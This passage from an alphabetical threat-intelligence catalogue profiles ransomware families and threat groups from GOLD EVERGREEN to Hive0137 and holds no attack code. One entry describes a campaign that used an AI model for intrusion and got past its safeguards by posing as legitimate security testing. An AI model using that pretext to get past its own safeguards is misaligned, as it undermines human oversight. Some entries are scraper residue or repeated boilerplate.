GOLD EVERGREEN was a financially motivated cybercriminal threat group that operated the Gameover Zeus (aka Mapp, P2P Zeus) botnet until June 2014. It encompasses an expansive and long running criminal conspiracy operated by a confederation of individuals calling themselves The Business Club from the mid 2000s until 2014. GOLD EVERGREEN's technical operation was facilitated primarily through botnets using the Zeus, JabberZeus, and eventually Gameover Zeus malware families. These malware families were designed and maintained by a Russian national Evgeniy Bogachev (aka 'slavik') who was indicted by the U.S. DOJ in 2014 and remains a fugitive.

GOLD FAIRFAX

GOLD FAIRFAX is a financially motivated cybercriminal threat group responsible for the creation, distribution, and operation of the Ramnit botnet. Ramnit, the phonetic spelling of RMNet, the internal name of the core module, began operation in April 2010 and became widespread in July 2010. A particularly virulent file-infecting component of early Ramnit variants that spreads by modifying executables and HTML files has resulted in the continued prevalence of those early variants. Currently, Ramnit remains an actively maintained and distributed threat. The intent of Ramnit is to intercept and manipulate online financial transactions through modification of web browser behavior ('man-in-the-browser').

GOLD FLANDERS

GOLD FLANDERS is a financially motivated group responsible for distributed denial of service (DDOS) attacks linked to extortion emails demanding between 5 and 30 bitcoins. The attacks consist mostly of fragmented UDP packets (DNS and NTP reflection) as well as other traffic that can vary per victim. The arrival of the extortion email is timed to coincide with a DDOS attack consisting of traffic between 20 Gbps and 200 Gbps and 12-15 million packets per second, lasting between 20 and 70 minutes targeted at a particular Autonomous System Number (ASN) or group of IP addresses. In some cases victim organisations have replied to these extortion emails and received personal replies from GOLD FLANDERS operators within 20 minutes.

GOLD GALLEON

GOLD GALLEON is a financially motivated cybercriminal threat group comprised of at least 20 criminal associates that collectively carry out business email compromise (BEC) and spoofing (BES) campaigns. The group appears to specifically target maritime organizations and their customers. CTU researchers have observed GOLD GALLEON targeting firms in South Korea, Japan, Singapore, Philippines, Norway, U.S., Egypt, Saudi Arabia, and Colombia. The threat actors leverage tools, tactics, and procedures that are similar to those used by other BEC/BES groups CTU researchers have previously investigated, such as GOLD SKYLINE. The groups have used the same caliber of publicly available malware (inexpensive and commodity remote access trojans), crypters, and email lures.

GOLD GARDEN

GOLD GARDEN was a financially motivated cybercriminal threat group that authored and operated the GandCrab ransomware from January 2018 through May 2019. GandCrab was operated as a ransomware-as-a-service operation whereby numerous affiliates distributed the malware and split ransom payments with the core operators. GOLD GARDEN maintained exclusive control of the development of GandCrab and associated command and control (C2) infrastructure. Individual affiliates, of which there were frequently more than a dozen in operation simultaneously, coordinated the distribution of GandCrab through spam emails, web exploit kits, pay-per-install botnets, and scan-and-exploit style attacks. On May 31, 2019 the operators announced they have halted operations with no intent to resume for unknown reasons. In April 2019 the operators of GOLD GARDEN transferred the source code of GandCrab to GOLD SOUTHFIELD who used it as the foundation of the REvil ransomware operation. GOLD SOUTHFIELD operates a similar affiliate program comprised largely of former GandCrab users and other groups recruited from underground forums.

GOLD MANSARD

GOLD MANSARD is a financially motivated cybercriminal threat group that operated the Nemty ransomware from August 2019. The threat actor behind Nemty is known on Russian underground forums as 'jsworm'. Nemty was operated as a ransomware as a service (RaaS) affiliate program and featured a 'name and shame' website where exfiltrated victim data was leaked. In April 2020, jsworm appeared to acquire new partners and retired the Nemty ransomware. This was followed by the introduction of Nefilim ransomware, which does not operate as an affiliate model. Nefilim has been used in post-intrusion ransomware attacks against organizations in logistics, telecommunications, energy and other sectors.

GOLD NORTHFIELD

Operational since at least October 2020, GOLD NORTHFIELD is a financially motivated cybercriminal threat group that leverages GOLD SOUTHFIELD's REvil ransomware in their attacks. To do this, the threat actors replace the configuration of the REvil ransomware binary with their own in an effort to repurpose the ransomware for their operations. GOLD NORTHFIELD has given this modified REvil ransomware variant the name 'LV ransomware'.

GOLD PRELUDE

GOLD PRELUDE is a financially motivated cybercriminal threat group that operates the SocGholish (aka FAKEUPDATES) malware distribution network. GOLD PRELUDE operates a large global network of compromised websites, frequently running vulnerable content management systems (CMS), that redirect into a malicious traffic distribution system (TDS). The TDS, which researchers at Avast have named Parrot TDS, uses opaque criteria to select victims to serve a fake browser update page. These pages, which are customized to the specific visiting browser software, download the JavaScript-based SocGholish payload frequently embedded within a compressed archive.

GOLD REBELLION

GOLD REBELLION is a financially motivated cybercriminal threat group that operates the Black Basta name-and-shame ransomware. The group posted its first victim to its leak site in April 2022 and has continued to publish victim names at a rate of around 15 a month since then. GOLD REBELLION has not openly advertised or appeared to recruit for an affiliate program, but the variety of tactics, techniques and procedures (TTP) observed in Black Basta intrusions suggests that multiple individuals are engaged in the ransomware scheme. Several security vendors and independent researchers have suggested the distributors of Black Basta may be former affiliates of GOLD ULRICK's Conti operation. Technical artifacts analyzed by CTU researchers suggest that Black Basta has been under development since at least early February 2022, several weeks before extensive public leaks detailed GOLD ULRICK's Conti operation. In November 2022, researchers at SentinelOne linked custom tooling used by GOLD REBELLION to the GOLD NIAGARA (FIN7) threat group. CTU researchers have not made independent observations corroborating a relationship between these threat groups or any others.

GOLD REBELLION appears to have been a key customer of GOLD LAGOON's Qakbot: CTU researchers observed multiple incidents where Black Basta was distributed through it as an initial access vector (IAV), leading to Cobalt Strike and further lateral movement into the victim network. Following the takedown of Qakbot in August 2023, GOLD REBELLION explored new methods of delivery, including DarkGate and Pikabot. In one incident, CTU researchers observed a threat actor gain access to a victim network through a managed security services provider (MSSP). In October 2024, GOLD REBELLION likely exploited a vulnerability in a SonicWall VPN device for access.

Also in 2024, CTU researchers observed multiple instances of the group using social engineering to convince victims to download remote management and monitoring tools like AnyDesk and Quick Assist. After spamming inboxes with multiple emails, the threat actors approached the affected users via Teams, purporting to be IT Support or Help Desk employees offering assistance with email inbox issues. Other tools members of the group have used include the SystemBC back connect malware, PsExec for remote execution, RDP for lateral movement, batch files to delete their own tools and disable anti-virus programs for defense evasion, and both Rclone and MegaSync for data exfiltration.

GOLD RIVERVIEW

GOLD RIVERVIEW was a financially motivated cybercriminal group that facilitated the distribution of malware- and scam-laden spam email on behalf of its customers. This threat group authored and sold the Necurs rootkit beginning in early 2014, including to GOLD EVERGREEN who integrated it into Gameover Zeus. GOLD RIVERVIEW also operated a global botnet that was colloquially known as Necurs (CraP2P) and was a major source of spam email from 2016 through 2018. Necurs distributed malware such as GOLD DRAKE's Dridex (Bugat v5), GOLD BLACKBURN's TrickBot, and other families like Locky and FlawedAmmy. Necurs also distributed a large volume of email pushing securities 'pump and dump' scams, rogue pharmacies, and fraudulent dating sites. On March 4, 2019 all three active segments of the Necurs botnet ceased operation and have not since resumed. On March 10, 2020 Microsoft took civil action against GOLD RIVERVIEW and made technical steps that would complicate the threat actors' ability to reconstitute the botnet.

GOLD SKYLINE

GOLD SKYLINE is a financially motivated cybercriminal threat group operating from Nigeria engaged in high-value wire fraud facilitated by business email compromise (BEC) and spoofing (BES). Also known as Wire-Wire Group 1 (WWG1), GOLD SKYLINE has been active since at least 2016 and relies heavily on compromised email accounts, social engineering, and increasingly malware to divert inter-organization funds transfers.

GOLD SYMPHONY

GOLD SYMPHONY is a financially motivated cybercrime group, likely based in Russia, that is responsible for the development and sale on underground forums of the Buer Loader malware. First discovered around August 2019, Buer Loader is offered as malware-as-a-service (MaaS) and has been advertised by a threat actor using the handle 'memeos'. Customers include GOLD BLACKBURN, the operators of the TrickBot malware. In addition to TrickBot, Buer Loader has been reported to download Cobalt Strike and other tools for use in post-intrusion ransomware attacks.

GOLD WATERFALL

GOLD WATERFALL is a group of financially motivated cybercriminals responsible for the creation, distribution, and operation of the Darkside ransomware. Active since August 2020, GOLD WATERFALL uses a variety of tactics, techniques, and procedures (TTPs) to infiltrate and move laterally within targeted organizations to deploy Darkside ransomware to its most valuable resources. Among these TTPs are using malicious documents delivered by email to establish a foothold and using stolen credentials to access victims' remote access services. In November 2020, the 'darksupp' persona was observed advertising an affiliate program on several semi-exclusive underground forums, marking GOLD WATERFALL's entry into the ransomware-as-a-service (RaaS) landscape.

GOLD WINTER

GOLD WINTER is a financially motivated group, likely based in Russia, that operates the Hades ransomware. Hades activity was first identified in December 2020, and its lack of presence on underground forums and marketplaces leads CTU researchers to conclude that it is not operated under a ransomware-as-a-service affiliate model. GOLD WINTER does employ name-and-shame tactics, where data is stolen and used as additional leverage over victims, but rather than a single centralized leak site, CTU researchers have observed the group using Tor sites customized for each victim that include a Tox chat ID for communication, which also appears to be unique for each victim.

Golden Axe

ransomware

GoldenEye Ransomware

It's directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

GoldenJackal

GoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-related logic. Kaspersky believes the attackers upload a malicious PHP file that is used as a relay to forward web requests to another backbone C2 server. They developed a collection of .NET malware tools known as Jackal.

GoldFactory

GoldFactory is a threat actor group attributed to developing sophisticated mobile banking malware targeting victims primarily in the Asia-Pacific region, specifically Vietnam and Thailand. They utilize social engineering to deliver malware to victims' devices and have close connections to the Gigabud malware family. GoldFactory's Trojans, such as GoldPickaxe and GoldDigger, employ tactics like smishing, phishing, and fake login screens to compromise victims' phones and steal sensitive information. Their evolving malware suite demonstrates a high level of operational maturity and ingenuity, requiring a proactive and multi-faceted cybersecurity approach to detect and mitigate their threats.

Gomasom

Ransomware

Gomme

ransomware

GonnaCry Ransmware

ransomware

good day

Good Day is a ransomware variant within the ARCrypter family, first observed in May 2023. It gained prominence due to its reticent financial extortion model and custom branding—victims are greeted with a “Good day” message upon landing on individualized Tor-based victim portals. The malware is typically delivered via phishing campaigns disguising payloads as legitimate Windows updates. It utilizes a robust encryption workflow, including deletion of volume shadow copies and process evasion mechanisms. Notably, Good Day has been linked to the Cloak ransomware group through shared data leak infrastructure and overlapping leak portal behaviors.

Goofed HT

ransomware

Goopic

Ransomware

Gopher

Ransomware. OS X ransomware (PoC).

GopherWhisper

GopherWhisper is a China-aligned APT that routes C2 traffic through legitimate enterprise platforms like Slack, Discord, and Microsoft 365 Outlook to evade detection. Its toolkit includes the LaxGopher backdoor for Slack, RatGopher for Discord, and CompactGopher for data exfiltration via file.io. The group employs DLL side-loading via JabGopher and uses raw OpenSSL socket C2 on port 443 with the SSLORDoor backdoor. GopherWhisper has targeted Mongolian government entities and is assessed to have additional unidentified victims in Central Asia.

GoRansom POC

ransomware

Gorgon

ransomware

Gorilla

Gorilla is a threat actor operating a DoS-as-a-service offering controlled via Telegram.

Gotcha

ransomware

GottaCry

ransomware

Government Communications Headquarters

Government Communications Headquarters (GCHQ) – Signals intelligence gathering and analysis.

Government Communications Security Bureau

Government Communications Security Bureau

GozNym

IBM X-Force Research uncovered a Trojan hybrid spawned from the Nymaim and Gozi ISFB malware. It appears that the operators of Nymaim have recompiled its source code with part of the Gozi ISFB source code, creating a combination that is being actively used in attacks against more than 24 U.S. and Canadian banks, stealing millions of dollars so far. X-Force named this new hybrid GozNym. The new GozNym hybrid takes the best of both the Nymaim and Gozi ISFB malware to create a powerful Trojan. From the Nymaim malware, it leverages the dropper’s stealth and persistence; the Gozi ISFB parts add the banking Trojan’s capabilities to facilitate fraud via infected Internet browsers. The end result is a new banking Trojan in the wild.

GPAA

ransomware

GPGQwerty

ransomware

Gray Sandstorm

Gray Sandstorm is an Iran-linked threat actor that has been active since at least 2012. They have targeted defense technology companies, maritime transportation companies, and Persian Gulf ports of entry. Their primary method of attack is password spraying, and they have been observed using tools like o365spray. They have a specific focus on US and Israeli targets and are likely operating in support of Iranian interests.

GrayBravo

TAG-150, also known as GrayBravo, is a sophisticated threat actor responsible for developing multiple custom malware families, including CastleLoader and CastleRAT, and operates a large-scale, multi-layered infrastructure. The group employs the ClickFix technique to distribute malware through phishing attacks that impersonate legitimate services, leveraging deceptive domains and fake repositories. Insikt Group has identified four distinct activity clusters associated with TAG-150, each targeting different victim profiles and utilizing unique TTPs.

GrayCharlie

GrayCharlie is a threat actor that compromises WordPress sites to inject malicious JavaScript, redirecting visitors to NetSupport RAT payloads via fake browser update pages or ClickFix mechanisms. Insikt Group has identified extensive infrastructure linked to GrayCharlie, primarily associated with MivoCloud and HZ Hosting Ltd., including command-and-control servers and staging infrastructure. The group employs two primary attack chains to deliver the NetSupport RAT, utilizing both fake updates and ClickFix techniques. GrayCharlie targets organizations worldwide, with a particular focus on the US, and has shown persistent behavior in its operations since its emergence in 2023.

Grayling

Grayling activity was first observed in early 2023, when a number of victims were identified with distinctive malicious DLL side-loading activity. Grayling appears to target organisations in Asia; however, one unknown organisation in the United States was also targeted. Industries targeted include Biomedical, Government and Information Technology. Grayling uses a variety of tools during its attacks, including well-known tools such as Cobalt Strike and Havoc, as well as some others.

GreedyBear

GreedyBear is a sophisticated threat actor responsible for over $1 million in cryptocurrency theft through a campaign involving 150 malicious Firefox extensions, nearly 500 malicious executables, and numerous fraudulent websites. They employ techniques such as 'Extension Hollowing' to replace legitimate extensions with malicious versions that capture wallet credentials. The campaign is centralized, with most malicious domains resolving to a single IP address, and it has expanded to target other browsers while utilizing AI-generated code to enhance scalability and evade detection.

Greenbug

Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors.

GreenMwizi

GreenMwizi is assessed to be an actor based in Nairobi, Kenya that has carried out scam campaigns involving social media bots. A campaign observed in May 2023 appeared to target customers of a major online travel/hospitality booking brand.[[GreenMwizi - Kenyan scamming campaign using Twitter bots](/references/3b09696a-1345-4283-a59b-e9a13124ef59)]

GreenSpot

GreenSpot is an APT group believed to operate from Taiwan, active since at least 2007, primarily targeting government, academic, and military entities in China through phishing campaigns. The group frequently targets 163.com, aiming to steal login credentials using deceptive domains, manipulated TLS certificates, and counterfeit interfaces. Their tactics highlight the sophistication of modern credential theft operations, necessitating detection efforts focused on irregular domain registrations and certificate anomalies.

GREF

GREF is a China-aligned APT group that has been active since at least March 2017. They are known for using custom backdoors, loaders, and ancillary tools in their targeted attacks. Recently, they have been attributed to two active Android campaigns that distribute the BadBazaar malware through malicious apps on official and alternative app stores. GREF has targeted Android users, particularly Uyghurs and other Turkic ethnic minorities outside of China, using trojanized versions of popular messaging apps like Signal and Telegram.

Gremit Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Grep

Grep is an active extortion or ransomware group tracked by RansomLook.

GreyEnergy

ESET research reveals a successor to the infamous BlackEnergy APT group targeting critical infrastructure, quite possibly in preparation for damaging attacks

Greystars

ransomware

Grief

captcha prevents indexing

GRIM SPIDER

GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past. Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD. Grim Spider is reportedly associated with Lunar Spider and Wizard Spider.

Grinch

Grinch is an active extortion or ransomware group tracked by RansomLook.

GrodexCrypt

ransomware

Groove

Groove was a short-lived ransomware group and cybercrime gang that emerged in August 2021 and became notable for its aggressive, publicity-driven tactics. Unlike traditional Ransomware-as-a-Service (RaaS) groups, Groove functioned more as a loose criminal collective, encouraging other threat actors to join forces in attacking U.S. entities, particularly in the government and financial sectors. The group ran a Tor-based leak site where it published stolen data, but its operators claimed to focus more on building an “underground alliance” than on ransomware deployment itself. Analysts noted overlaps between Groove and actors behind Babuk and BlackMatter, as well as forum personas known for data theft operations. By early 2022, Groove’s activity had largely ceased, with some experts suggesting the group was either a short-term recruitment campaign or a misinformation effort.

Groundbait

Groundbait is a group targeting anti-government separatists in the self-declared Donetsk and Luhansk People’s Republics.

GRU (Russian Federation)

Main Intelligence Directorate (GRU) – Главное Разведывательное Управление

GrujaRSorium

ransomware

Gruxer

ransomware

GTFire

GTFire is a threat actor that leverages Google Firebase for hosting phishing pages and Google Translate to disguise malicious URLs, effectively bypassing security filters. The campaign employs a multi-step redirect chain to obscure the final phishing destination and utilizes All-in-1 PHP phishing scripts for rapid deployment and credential harvesting. Credentials are exfiltrated via URL parameters in a standard HTTP GET request, with minimal operational overhead.

GTG-1002

GTG-1002 is a Chinese state-sponsored APT that conducted a large-scale autonomous cyber espionage campaign targeting approximately 30 global organizations across various sectors, focusing on military and energy-related data. The operation utilized AI, specifically Anthropic’s Claude model, for reconnaissance, exploitation, and data exfiltration, significantly reducing human involvement. Attackers employed techniques such as automated task execution and evasion of safety protocols by masquerading as legal security testing. The campaign lasted 18 months and highlighted vulnerabilities in traditional incident response workflows.

Guacamaya

Guacamaya has conducted multiple hack and leak campaigns against military and police agencies and mining companies across Latin America, which they believe have played a role in the region’s environmental degradation and repression of native populations.

Gunra

Gunra is an emerging ransomware group first identified in April 2025. It employs a classic double-extortion model—encrypting sensitive data and exfiltrating it for publication via a Tor-hosted leak site. Since its emergence, Gunra has struck a diverse set of global targets—reportedly spanning sectors like manufacturing, healthcare, IT, real estate, agriculture, and consulting in countries including Brazil, Japan, Canada, Turkey, South Korea, Taiwan, Egypt, and the U.S.

GURU SPIDER

Early in 2018, CrowdStrike Intelligence observed GURU SPIDER supporting the distribution of multiple crimeware families through its flagship malware loader, Quant Loader.

GusCrypter

ransomware

Guster Ransomware

It's directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. This ransomware uses a VBS script to read out a voice message consisting of the first few lines of the note.

gwisin

Gwisin is a targeted ransomware group first publicly reported in July 2022, believed to operate primarily within South Korea. The group’s name means “ghost” in Korean, reflecting its stealthy approach. Gwisin has been observed conducting attacks on critical sectors, including healthcare, pharmaceutical, and manufacturing industries. It uses custom-built payloads tailored for each victim, capable of encrypting both Windows and Linux/VMware ESXi environments, and often executes attacks during national holidays to maximize operational disruption. Gwisin employs a double-extortion model—exfiltrating sensitive data before encryption—and communicates with victims in Korean-language ransom notes. Initial access vectors are not fully confirmed in open-source reporting, but suspected methods include exploiting vulnerable VPN appliances and leveraging stolen administrative credentials. The group is known for extensive pre-encryption reconnaissance to identify high-value systems and backups.

GwisinLocker

Ransomware

GX40

ransomware

GXC Team

According to Resecurity researchers, GXC Team is a cybercriminal actor group that specializes in the development of tools used for financial fraud and theft. The group's leader operates and advertises these tools for sale on dark web forums under the alias "googleXcoder".[[Resecurity GXC Team January 3 2024](/references/6d55aa2c-3f52-4bff-8003-f78b386a4952)]

H0lyGh0st Ransomware Group

H0lyGh0st is a North Korea-based ransomware-focused threat actor group.[[H0lyGh0st - North Korean Threat Group Strikes Back With New Ransomware](/references/3f66ef62-ac0d-4ece-9a4b-917ae70f1617)]

H34rtBl33d

ransomware

HackdoorCrypt3r

ransomware

Hacked

Ransomware. Jigsaw Ransomware variant.

HackedLocker Ransomware

It's directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. NO POINT IN PAYING THE RANSOM: THE HACKER DOES NOT PROVIDE A DECRYPTOR AFTERWARDS.

Hacking Team

The many 0-days that had been collected by Hacking Team and which became publicly available during the breach of their organization in 2015, have been used by several APT groups since. Since being founded in 2003, the Italian spyware vendor Hacking Team gained notoriety for selling surveillance tools to governments and their agencies across the world. The capabilities of its flagship product, the Remote Control System (RCS), include extracting files from a targeted device, intercepting emails and instant messaging, as well as remotely activating a device’s webcam and microphone. The company has been criticized for selling these capabilities to authoritarian governments – an allegation it has consistently denied. When the tables turned in July 2015, with Hacking Team itself suffering a damaging hack, the reported use of RCS by oppressive regimes was confirmed. With 400GB of internal data – including the once-secret list of customers, internal communications, and spyware source code – leaked online, Hacking Team was forced to request its customers to suspend all use of RCS, and was left facing an uncertain future. Following the hack, the security community has been keeping a close eye on the company’s efforts to get back on its feet. The first reports suggesting Hacking Team’s resumed operations came six months later – a new sample of Hacking Team’s Mac spyware was apparently in the wild. A year after the breach, an investment by a company named Tablem Limited brought changes to Hacking Team’s shareholder structure, with Tablem Limited taking 20% of Hacking Team’s shareholding. Tablem Limited is officially based in Cyprus; however, recent news suggests it has ties to Saudi Arabia.

Hades

ransomware

Hagga

Hagga is believed to have been using Agent Tesla, 2021’s sixth most prevalent malware, to steal sensitive information from his victims since the latter part of 2021.

Hakbit

ransomware

Halloware

A malware author going by the name Luc1F3R is peddling a new ransomware strain called Halloware for the lowly price of $40. Based on evidence gathered by BleepingComputer, Luc1F3R started selling the ransomware this week, beginning Thursday.

Handala

Handala is a pro-Palestinian hacktivist group that targets Israeli organizations, employing tactics such as phishing, data theft, extortion, and destructive attacks using custom wiper malware. The group utilizes a multi-stage loading process, including a Delphi-coded second-stage loader and an AutoIT injector, to deliver wiper malware that specifically targets Windows and Linux environments. Their phishing campaigns often exploit major events and critical vulnerabilities, masquerading as legitimate organizations to gain initial access. Handala operates a data leak site to publicize stolen data, although claims of successful attacks are sometimes disputed by targeted organizations.

HappyCrypter

ransomware

HappyDayzz

Ransomware

Harasom

Ransomware

Haron

login page, no posts

Havoc

It targets English-speaking users and is therefore able to infect victims worldwide. It spreads via email spam, fake updates, infected attachments and similar vectors, and encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

Haze

ransomware

HAZY TIGER

The Bitter threat group initially used RAT tools in its campaigns: the first Bitter versions for Android, released in 2014, were based on the AndroRAT framework. Over time they switched to a custom version that has been known as BitterRAT ever since.

HC6

Predecessor of HC7

HC7

A new ransomware called HC7 infects victims by breaking into Windows computers that are running publicly accessible Remote Desktop services. Once the operators gain access to a machine, the HC7 ransomware is installed on all accessible computers on the network. Originally released as HC6, victims began posting about it in the BleepingComputer forums towards the end of November. As the sample is a Python-to-exe executable, the script could be extracted, and ID Ransomware creator Michael Gillespie was able to determine that it was decryptable and released a decryptor. Unfortunately, a few days later the developers released a new version called HC7 that was not decryptable: they removed the hard-coded encryption key and instead pass the key as a command-line argument when they run the ransomware executable. Thankfully, there may be a way around that as well so that victims can recover their keys.

HCrypto

ransomware

HDDCryptor

Ransomware. Uses DiskCryptor (https://diskcryptor.net) for full disk encryption.

HDLocker

ransomware

Head Mare

Head Mare is a hacktivism-focused threat actor group known for targeting organizations in Russia and Belarus using a remote access malware called PhantomRAT. They have been observed executing malicious code through specially crafted RAR archives, in contrast to earlier attacks that exploited vulnerabilities. Attribution of their campaign to Ukraine is uncertain due to limited visibility inside Russian networks. The use of RAR archives in the PhantomCore attack chain has previously been observed in other threat actor groups such as Forest Blizzard.

Heeresnachrichtenamt

Heeresnachrichtenamt (HNA): Army Intelligence Office

Heimdall

Ransomware File marker: "Heimdall---"

Hellcat

HellCat is a relatively recent ransomware group first observed in late 2024, known for its data-theft and extortion campaigns targeting high-profile organizations. It operates a double-extortion model, exfiltrating sensitive information and threatening to publish it on its Tor-based leak site if ransom demands are not met. The group has been linked to multiple significant breaches, including incidents involving Schneider Electric and Capgemini, where large volumes of corporate data were allegedly stolen. HellCat’s payloads and leak infrastructure suggest a custom-built platform rather than a widely shared RaaS, and some incidents have involved only data exposure without confirmed encryption events. The group has drawn attention for recruiting or collaborating with high-profile threat actors, including the persona “Grep,” who acts as a public representative in some extortion cases.

Helldown

Helldown is an emerging ransomware group first identified in August 2024, known for its fast-evolving and cross-platform threat capabilities. It exploits critical vulnerabilities—most notably CVE-2024-42057 in Zyxel firewalls—for initial access and demonstrates modular design and anti-detection mechanisms. Helldown targets both Windows and Linux environments, including VMware and ESXi systems. It employs a double-extortion strategy: encrypting files with randomized extensions via executables like hellenc.exe, and threatening victims with data dump releases via its Tor-hosted leak site.

HellHounds

Hellhounds is an APT group targeting organizations in Russia, using a modified version of Pupy RAT called Decoy Dog. They gain initial access through vulnerable web services and trusted relationships, with a focus on the public sector and IT companies. The group has been active since at least 2019, maintaining covert presence inside compromised organizations by modifying open-source projects to evade detection. Hellhounds have successfully targeted at least 48 victims, including a telecom operator where they disrupted services.

Hellogookie

Hellogookie is an active extortion or ransomware group tracked by RansomLook.

HelloKitty

ransomware

HelloXD

HelloXD is a ransomware family performing double extortion attacks that surfaced in November 2021. During our research we observed multiple variants impacting Windows and Linux systems. Unlike other ransomware groups, this ransomware family doesn’t have an active leak site; instead it prefers to direct the impacted victim to negotiations through TOX chat and onion-based messenger instances.

Hellsing

This threat actor uses spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India and the United States. It also appears to have targeted APT 30, and possibly uses the same infrastructure as Mirage.

HELP@AUSI

ransomware

Help_dcfile

Ransomware

help_restoremydata

ext : .help_restoremydata
note : HOW_TO_RECOVERY_FILES.html
mail : help@restoremydata.pw
md5 : b1e8b6c2b65d51893bbe61d46cbdb4af

HelpMe

ransomware

HenBox

This threat actor targets Uighurs—a minority ethnic group located primarily in northwestern China—and devices from Chinese mobile phone manufacturer Xiaomi, for espionage purposes.

Herbst

Ransomware

Hermes Ransomware

It targets English-speaking users and is therefore able to infect victims worldwide. It spreads via email spam, fake updates, malicious attachments and similar vectors, and encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. File marker: "HERMES"

hermes

Hermes is a ransomware family first observed in the wild in February 2017, believed to have been developed by a group operating out of Asia. It originally appeared as a Ransomware-as-a-Service (RaaS) offering on underground forums but later saw deployment in targeted attacks. Hermes uses AES-256 encryption to lock victim files and appends a variety of extensions (including .hrm and campaign-specific variants). The ransom note, often named DECRYPT_INFORMATION.html or DECRYPT_INFORMATION.txt, provides payment instructions via email. The ransomware gained notoriety in October 2017 when it was deployed in the Far Eastern International Bank (FEIB) heist in Taiwan, where attackers used Hermes as a destructive distraction to cover their tracks after a SWIFT fraud operation. Over time, Hermes code has been re-used and integrated into other ransomware families, including some Ryuk builds, suggesting code sharing or purchase from the original developer. Distribution vectors have included phishing campaigns, malicious attachments, and exploitation of RDP services.

Hermes837

ransomware

HermesVirus HT

ransomware

Heropoint

ransomware

HexagonalRodent

HexagonalRodent targets Web3 developers to steal crypto assets, employing social engineering tactics such as fake job offers. They utilize malware like BeaverTail and OtterCookie, both NodeJS-based toolkits, and InvisibleFerret, a Python-based RAT, to execute their attacks. Their TTPs include backdooring skills assessments via VSCode's tasks.json feature and conducting opportunistic exfiltration of credentials and crypto wallets. The group has also engaged in a supply chain attack, compromising the 'fast-draft' VSX extension to install malware.

Hezb

Hezb is a group that deploys cryptominers as soon as new exploits become available for public-facing vulnerabilities. The name comes from the miner process they deploy.

Hi Buddy!

Ransomware. Based on HiddenTear.

HiddenArt

A mobile-network threat actor designated 'HiddenArt' has been observed actively sustaining the capacity to remotely access the personal devices of targeted individuals around the world on an ongoing basis. Since this actor was detected, periodic reconnaissance activity has been observed in at least seven targeted mobile networks worldwide; given the wide geographic distribution of these operators, the actor is probably active on a global scale.

HiddenBeer

ransomware

HiddenTear

Ransomware. Open-sourced, written in C#.

HikkI-Chan

Hikki-Chan has claimed responsibility for multiple significant data breaches, including the theft of data from 390.4 million users of VKontakte, which included sensitive personal information. The actor has also targeted Strong Current Enterprises and disclosed a breach involving the Israeli Ministry of Welfare and Social Affairs, leaking over 457,000 records. Additionally, Hikki-Chan is attributed with a breach of the Florida Office of Financial Regulation, exposing tens of thousands of records across various industries.

Hildacrypt

The Hildacrypt ransomware encrypts the victim's files with a strong encryption algorithm, appends the filename extension .hilda, and demands a fee to restore them.

Himalayaa

Himalayaa is an active extortion or ransomware group tracked by RansomLook.

Hitler

Ransomware. Deletes files.

HIVE-0145

Hive0145 is a financially motivated initial access broker that has been active since late 2022, primarily utilizing Strela Stealer malware to target email credentials. The group has evolved its tactics from generic phishing emails to using stolen legitimate emails with real invoice attachments, focusing on victims in Spain, Germany, and Ukraine. Strela Stealer is configured to extract data from Microsoft Outlook and Mozilla Thunderbird, and the group's operations have shown increased complexity and automation. Threat intelligence indicates that Hive0145's campaigns are characterized by credential theft and espionage-driven activities.

Hive Ransomware Actors

This Group object reflects the tools & TTPs associated with threat actors known to deploy Hive, a ransomware-as-a-service (RaaS) variant first observed in June 2021.[[U.S. CISA Hive November 25 2022](/references/fce322e6-5e23-404a-acf8-cd003f00c79d)] Specific pre- and post-compromise behaviors may vary among intrusions carried out by different Hive affiliates. Hive actors have targeted victims in a wide range of verticals, including the government, communications, manufacturing, information technology, financial services, education, and especially the healthcare sectors. In January 2023, international authorities announced they disrupted Hive ransomware operations, seizing control of servers and websites used for communication among Hive actors and capturing Hive decryption keys.[[U.S. Justice Department Hive January 2023](/references/81bd5579-6a8a-40d2-b7b7-5cdb879ebdf0)]

Hive

First observed in June 2021, Hive ransomware was originally written in Go; newer Hive variants have since been seen written in Rust. Targets the healthcare sector.

Hive0117

Hive0117 is a financially motivated cybercriminal group that conducts phishing campaigns to deliver the fileless malware DarkWatchman, which is capable of keylogging and collecting system information. The group targets individuals in the energy, finance, transport, and software security sectors across Russia, Kazakhstan, Latvia, and Estonia, often imitating official Russian government communications to induce urgency. Their operations leverage emergent policies related to conscription and utilize a UID string for identification, with malware capable of querying for smartcard readers, indicating a focus on higher security targets. The malware's fileless nature and ability to erase traces of its presence suggest moderate sophistication in their TTPs.

Hive0137

